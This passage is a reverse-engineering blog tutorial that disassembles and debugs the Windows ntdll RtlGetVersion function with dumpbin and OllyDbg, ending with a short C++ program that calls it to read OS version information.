(Relative Virtual Address) 3859?. The RVA is the relative address that the RtlGetVersion function will be loaded when the dll will be loaded into memory and thus gets a Base Address. If, for example, the RVA of a function is 15 and the dll will be loaded at position 100 then the function will be located at address 115. I would like to see what this function does. So, I will dissaseble it. To do this I have to disassemble the whole ntdll as follows: D:\work2>dumpbin /disasm ntdll.dll > ntdlldisasm.txt The file ntdlldisasm.txt that I create contains the whole assembly code of ntdll. Its a small source file of... 17Mb! Now, I have to search in this file for my RtlGetVersion function. This is easy. I just have to apply the rule: IMAGE_BASE_ADDRESS + Function_RVA = Function Address I already have the RVA. its 0003859A. But what is the IMAGE_BASE_ADDRESS of ntdll? This is easy too. I just enter: D:\work2>dumpbin /headers ntdll.dll | find "image base" 7DE70000 image base (7DE70000 to 7DFEFFFF) So 7DE70000 + 0003859A = 7DEA859A. which means that my function RtlGetVersion located at address 7DEA859A. Image 2: the ntdll.dll disassembly code The actual code of RtlGetVersion is the following: 7DEA859A: 8B FF mov edi,edi 7DEA859C: 55 push ebp 7DEA859D: 8B EC mov ebp,esp 7DEA859F: 51 push ecx 7DEA85A0: 64 A1 18 00 00 00 mov eax,dword ptr fs:[00000018h] 7DEA85A6: 53 push ebx 7DEA85A7: 56 push esi 7DEA85A8: 8B 75 08 mov esi,dword ptr [ebp+8] 7DEA85AB: 57 push edi 7DEA85AC: 8B 78 30 mov edi,dword ptr [eax+30h] 7DEA85AF: 8B 87 A4 00 00 00 mov eax,dword ptr [edi+000000A4h] 7DEA85B5: 89 46 04 mov dword ptr [esi+4],eax 7DEA85B8: 8B 87 A8 00 00 00 mov eax,dword ptr [edi+000000A8h] 7DEA85BE: 89 46 08 mov dword ptr [esi+8],eax 7DEA85C1: 0F B7 87 AC 00 00 movzx eax,word ptr [edi+000000ACh] 00 7DEA85C8: 89 46 0C mov dword ptr [esi+0Ch],eax 7DEA85CB: 8B 87 B0 00 00 00 mov eax,dword ptr [edi+000000B0h] 7DEA85D1: 89 46 10 mov dword ptr [esi+10h],eax 7DEA85D4: 8B 87 F4 01 00 00 mov eax,dword ptr [edi+000001F4h] 7DEA85DA: 85 C0 test eax,eax 7DEA85DC: 74 0A je 7DEA85E8 7DEA85DE: 66 83 38 00 cmp word ptr [eax],0 7DEA85E2: 0F 85 BB 78 05 00 jne 7DEFFEA3 7DEA85E8: 33 C0 xor eax,eax 7DEA85EA: 66 89 46 14 mov word ptr [esi+14h],ax 7DEA85EE: 81 3E 1C 01 00 00 cmp dword ptr [esi],11Ch 7DEA85F4: 75 5E jne 7DEA8654 7DEA85F6: 66 0F B6 87 AF 00 movzx ax,byte ptr [edi+000000AFh] 00 00 7DEA85FE: 66 89 86 14 01 00 mov word ptr [esi+00000114h],ax 00 7DEA8605: 66 8B 87 AE 00 00 mov ax,word ptr [edi+000000AEh] 00 7DEA860C: B9 FF 00 00 00 mov ecx,0FFh 7DEA8611: 66 23 C1 and ax,cx 7DEA8614: 66 89 86 16 01 00 mov word ptr [esi+00000116h],ax 00 7DEA861B: 66 A1 D0 02 FE 7F mov ax,word ptr ds:[7FFE02D0h] 7DEA8621: 66 89 86 18 01 00 mov word ptr [esi+00000118h],ax 00 7DEA8628: 8D 45 FC lea eax,[ebp-4] 7DEA862B: 8D BE 1A 01 00 00 lea edi,[esi+0000011Ah] 7DEA8631: 50 push eax 7DEA8632: C6 07 00 mov byte ptr [edi],0 7DEA8635: E8 28 00 00 00 call 7DEA8662 7DEA863A: 84 C0 test al,al 7DEA863C: 74 16 je 7DEA8654 7DEA863E: 8B 45 FC mov eax,dword line ptr [ebp-4] 7DEA8641: 88 07 mov byte ptr [edi],al 7DEA8643: 83 F8 01 cmp eax,1 7DEA8646: 75 0C jne 7DEA8654 7DEA8648: B8 EF FF 00 00 mov eax,0FFEFh 7DEA864D: 66 21 86 18 01 00 and word ptr [esi+00000118h],ax 00 7DEA8654: 5F pop edi 7DEA8655: 5E pop esi 7DEA8656: 33 C0 xor eax,eax 7DEA8658: 5B pop ebx 7DEA8659: C9 leave 7DEA865A: C2 04 00 ret 4 I present this code just for the shake of knowledge and I am not to go in a line by line explanation as I promised. I am going to do something more practical: I will execute the above code using Olly debugger and I will examine the results. Ok, it sounds interesting, but how can I call the specific function that is inside a DLL? With Olly this is easy. Before I start, I want to check the documentation of this function. Indeed here is the documentation that microsoft provides. The RtlGetVersion routine returns version information about the currently running operating system. Syntax NTSTATUS RtlGetVersion( __out PRTL_OSVERSIONINFOW lpVersionInformation ); Parameters lpVersionInformation [out] Pointer to either a RTL_OSVERSIONINFOW structure or a RTL_OSVERSIONINFOEXW structure that contains the version information about the currently running operating system. A caller specifies which input structure is used by setting the dwOSVersionInfoSize member of the structure to the size in bytes of the structure that is used. Return Value RtlGetVersion returns STATUS_SUCCESS. Remarks RtlGetVersion is the kernel-mode equivalent of the user-mode GetVersionEx function in the Windows SDK. See the example in the Windows SDK that shows how to get the system version. As we can see, this function has no input arguments and once it is called returns its results to the structure RTL_OSVERSIONINFOW. The definition in this structure is here. dwOSVersionInfoSize Specifies the size in bytes of an RTL_OSVERSIONINFOW structure. This member must be set before the structure is used with RtlGetVersion. dwMajorVersion Identifies the major version number of the operating system. For example, for Windows 2000, the major version number is five. dwMinorVersion Identifies the minor version number of the operating system. For example, for Windows 2000 the minor version number is zero. dwBuildNumber Identifies the build number of the operating system. dwPlatformId Identifies the operating system platform. For Microsoft Win32 on NT-based operating systems, RtlGetVersion returns the value VER_PLATFORM_WIN32_NT. szCSDVersion Contains a null-terminated string, such as "Service Pack 3", which indicates the latest Service Pack installed on the system. If no Service Pack has been installed, the string is empty. Ok, now I know what I expect as a result: The structure RTL_OSVERSIONINFOW. Now, I just return to my initial goal: To execute the function via Olly. Because we are talking about a DLL (and to about an executable) I will do the following: After loading the DLL in Olly I will go to the address where my function is located and I will put there a new origin point, as you can see in the next image. Image 3: The new origin point is the address of RtlGetVersion. Note that the address of RtlGetVersion is not the same of what I get from the hexdump output. This is not odd and can be explained by the fact that the Base Address in each case is different. After setting my new origin, I put a break point at address 776D859A and I am now ready to press RUN to meet this breakpoint and then I will go line by line (by pressing F10) examining the function execution and the registers values. In addition, in order to check the results in a more reliable way, I will do the following: I will execute from command line the "winver" system command in order to check (according to Microsoft documentation) the values. The winver command gives me the following: Image 4: The output of the winver command. Note the string "Version 6.1 (Build 7600)". I must see the same result after executing the function RtlGetVersion. Below there is an analysis of the code that I get from Olly with my remarks for the registers values I get. I suppose that the remarks are descriptive enough so no more are necessary. 776D859A > 8BFF MOV EDI,EDI | 776D859C 55 PUSH EBP | Standard function prologue 776D859D 8BEC MOV EBP,ESP | 776D859F 51 PUSH ECX 776D85A0 64:A1 18000000 MOV EAX,DWORD PTR FS:[18] ====>> return the TEB (Thread Entry Block) address 776D85A6 53 PUSH EBX 776D85A7 56 PUSH ESI 776D85A8 8B75 08 MOV ESI,DWORD PTR SS:[EBP+8] ====>> return the PEB (Process Entry Block) address 776D85AB 57 PUSH EDI 776D85AC 8B78 30 MOV EDI,DWORD PTR DS:[EAX+30] 776D85AF 8B87 A4000000 MOV EAX,DWORD PTR DS:[EDI+A4] ===>> eax=6 (MajorVersion) 776D85B5 8946 04 MOV DWORD PTR DS:[ESI+4],EAX 776D85B8 8B87 A8000000 MOV EAX,DWORD PTR DS:[EDI+A8] ===>> eax=1 (MinorVersion) 776D85BE 8946 08 MOV DWORD PTR DS:[ESI+8],EAX 776D85C1 0FB787 AC000000 MOVZX EAX,WORD PTR DS:[EDI+AC] ===>> eax=00001DB0 i.e. 7600 (BuildNumber) MOV with zero eXtended 776D85C8 8946 0C MOV DWORD PTR DS:[ESI+C],EAX 776D85CB 8B87 B0000000 MOV EAX,DWORD PTR DS:[EDI+B0] ===>> eax=2 (platformID) 776D85D1 8946 10 MOV DWORD PTR DS:[ESI+10],EAX 776D85D4 8B87 F4010000 MOV EAX,DWORD PTR DS:[EDI+1F4] 776D85DA 85C0 TEST EAX,EAX 776D85DC 74 0A JE SHORT ntdll.776D85E8 776D85DE 66:8338 00 CMP WORD PTR DS:[EAX],0 776D85E2 0F85 BB780500 JNZ ntdll.7772FEA3 776D85E8 33C0 XOR EAX,EAX 776D85EA 66:8946 14 MOV WORD PTR DS:[ESI+14],AX 776D85EE 813E 1C010000 CMP DWORD PTR DS:[ESI],11C 776D85F4 75 5E JNZ SHORT ntdll.776D8654 776D85F6 66:0FB687 AF0000>MOVZX AX,BYTE PTR DS:[EDI+AF] 776D85FE 66:8986 14010000 MOV WORD PTR DS:[ESI+114],AX 776D8605 66:8B87 AE000000 MOV AX,WORD PTR DS:[EDI+AE] 776D860C B9 FF000000 MOV ECX,0FF 776D8611 66:23C1 AND AX,CX 776D8614 66:8986 16010000 MOV WORD PTR DS:[ESI+116],AX 776D861B 66:A1 D002FE7F MOV AX,WORD PTR DS:[7FFE02D0] 776D8621 66:8986 18010000 MOV WORD PTR DS:[ESI+118],AX 776D8628 8D45 FC LEA EAX,DWORD PTR SS:[EBP-4] 776D862B 8DBE 1A010000 LEA EDI,DWORD PTR DS:[ESI+11A] 776D8631 50 PUSH EAX 776D8632 C607 00 MOV BYTE PTR DS:[EDI],0 776D8635 E8 28000000 CALL ntdll.RtlGetNtProductType 776D863A 84C0 TEST AL,AL 776D863C 74 16 JE SHORT ntdll.776D8654 776D863E 8B45 FC MOV EAX,DWORD PTR SS:[EBP-4] 776D8641 8807 MOV BYTE PTR DS:[EDI],AL 776D8643 83F8 01 CMP EAX,1 776D8646 75 0C JNZ SHORT ntdll.776D8654 776D8648 B8 EFFF0000 MOV EAX,0FFEF 776D864D 66:2186 18010000 AND WORD PTR DS:[ESI+118],AX 776D8654 5F POP EDI 776D8655 5E POP ESI 776D8656 33C0 XOR EAX,EAX 776D8658 5B POP EBX 776D8659 C9 LEAVE 776D865A C2 0400 RETN 4 Very well. As you can see, I get the same results. There is another thing that I would like to point out: Pay attention at address 776D8635. In this address a function is called: the RtlGetNtProductType. This RtlGetNtProductType is probably internal and... undocumented. More about undocumented functions we will discuss in a later article... We achive the following, so far: 1. We see which functions exist inside the ntdll.dll. 2. We select and examine one of them. 3. We execute it and we get its result line by line by examining its source (disassembly) code. Be carefull when you mess around with native API functions. If something goes wrong it is very possible to freeze your system. REMARK: Until now we examine functions with 'Rtl' as prefix. Microsoft choose this naming convention for its internal functions. Rtl means RunTime Library. In addition, inside ntdll we will see another prefix: the Zw. Functions with this prefix make direct calls to the kernel. In general, you must know that the naming convetion used by Microsoft following the formula: <Prefix><Operation><Object> What remains to be done is a program in C language that will direct call this function from the native API. This program could be used as a base for more advanced... checks, using even undocumented functions If you search the internet you will not find many sources of how to call RtlGetVersion direct from Native API. So, I suppose that this code could put a small brick to cover this gap. The program is in C++ in Visual Studio 2010. /////////////////////////////////////////////////////////////////////// // Kernel01.cpp : Call the RtlGetVersion from native API // © by Thiseas 2011 for www.p0wnbox.com // #include "stdafx.h" #include <Windows.h> typedef void (WINAPI *pwinapi)(PRTL_OSVERSIONINFOW); //http://www.osronline.com/ddkx/kmarch/k109_452q.htm int _tmain(int argc, _TCHAR* argv[]) { RTL_OSVERSIONINFOW info; pwinapi p_pwinapi; ZeroMemory(&info, sizeof(RTL_OSVERSIONINFOW)); p_pwinapi = (pwinapi) GetProcAddress(GetModuleHandle(TEXT("ntdll.dll")), "RtlGetVersion"); p_pwinapi(&info); return(0); } There is no need to spend more bytes for comments. Please try this by yourself... Debug and disassemble this little program and repeat the procedure that we just describe above. I will promise you that you will be disappointed... Happy Reversing! Posted by Andreas Venieris at 12:50 AM Sursa: 0x191 Unauthorized: Debugging the Native Windows API
×
×
  • Create New...